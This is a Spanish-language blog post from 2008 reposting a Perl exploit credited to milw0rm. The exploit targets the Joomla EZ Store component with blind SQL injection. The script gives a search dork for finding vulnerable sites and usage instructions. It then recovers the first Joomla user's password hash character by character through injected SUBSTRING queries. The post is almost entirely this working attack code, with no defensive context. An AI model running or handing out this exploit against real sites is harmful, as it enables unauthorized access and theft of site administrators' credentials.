miércoles, 6 de agosto de 2008

Joomla Component EZ Store Blind SQL Injection Exploit

#!/usr/bin/perl
#Note:Sometimes you have to change the regexp to viewcategory/catid,".$cid."
use LWP::UserAgent;
use Getopt::Long;

if(!$ARGV[1])
{
print " \n";
print " ################################################################\n";
print " # Joomla Component EZ Store Blind SQL Injection Exploit #\n";
print " # Author:His0k4 [ALGERIAN HaCkeR] #\n";
print " # #\n";
print " # Conctact: His0k4.hlm[at]gamil.com #\n";
print " # Greetz: All friends & muslims HacKeRs #\n";
print " # Greetz2: http://www.dz-secure.com #\n";
print " # #\n";
print " # Dork: inurl:com_ezstore #\n";
print " # Usage: perl ezstore.pl host path #\n";
print " # Example: perl ezstore.pl www.host.com /joomla/ -p 11 -c 2 #\n";
print " # #\n";
print " # Options: #\n";
print " # -t Valid procuct id #\n";
print " # -c Category value of the following product id #\n";
print " ################################################################\n";

exit;
}

my $host = $ARGV[0];
my $path = $ARGV[1];
my $cid = $ARGV[2];
my $pid = $ARGV[3];

my %options = ();
GetOptions(\%options, "c=i", "x=s", "p=i");

print "[~] Exploiting...\n";

if($options{"c"})
{
$cid = $options{"c"};
}

if($options{"p"})
{
$pid = $options{"p"};
}

syswrite(STDOUT, "[~] MD5-Hash: ", 14);

for(my $i = 1; $i <= 32; $i++) { my $f = 0; my $h = 48; while(!$f && $h <= 57) { if(istrue2($host, $path, $cid, $pid, $i, $h)) { $f = 1; syswrite(STDOUT, chr($h), 1); } $h++; } if(!$f) { $h = 97; while(!$f && $h <= 122) { if(istrue2($host, $path, $cid, $pid, $i, $h)) { $f = 1; syswrite(STDOUT, chr($h), 1); } $h++; } } } print "\n[~] Exploiting done\n"; sub istrue2 { my $host = shift; my $path = shift; my $cid = shift; my $pid = shift; my $i = shift; my $h = shift; my $ua = LWP::UserAgent->new;
my $query = "http://".$host.$path."index.php?option=com_ezstore&Itemid=1&func=detail&id=".$pid." and (SUBSTRING((SELECT password FROM jos_users LIMIT 0,1),".$i.",1))=CHAR(".$h.")";

if($options{"x"})
{
$ua->proxy('http', "http://".$options{"x"});
}

my $resp = $ua->get($query);
my $content = $resp->content;
my $regexp = "viewcategory&catid=".$cid."";

if($content =~ /$regexp/)
{
return 1;
}
else
{
return 0;
}

}

# milw0rm.com [2008-08-03]
Se produjo un error en este gadget.

Etiquetas

INTERNET (457) newsweek (305) SEGURIDAD (225) software (136) HACK (86) Hacker (46) GOOGLE (44) Geek (41) hardware (36) WINDOWS (34) Hackers (31) CRACK (29) video (28) DESCARGA (27) facebook (27) videos (26) Celulares (25) MICROSOFT (22) Informatica (21) apple (19) GRATIS (18) technology (18) virus (18) exploit (17) computación (16) informatico (16) web (15) cracker (14) INALAMBRICO (13) WINDOWS 7 (13) noticias (11) MSN (10) termino (10) ACTUALIZACION (9) Gamer (9) LapTops (9) Mac (9) PASSWORD (9) WINDOWS XP (9) dns (9) firefox (9) juegos (9) FOTOS (8) cientifico (8) iphone (8) WEP (7) antivirus (7) bibliografia (7) Desencriptar (6) INFINITUM (6) wifi (6) youtube (6) Craker (5) Culiacan (5) DESMOSTRACION (5) TELEFONIA (5) messenger (5) DIRECTA (4) DOWNLOAD (4) ESPAÑOL (4) XBOX (4) gmail (4) xss (4) Glosario (3) HTML (3) WPA (3) anuncios (3) hosting (3) hotmail (3) Guru (2) ajax (2) ataques (2) wpa2 (2)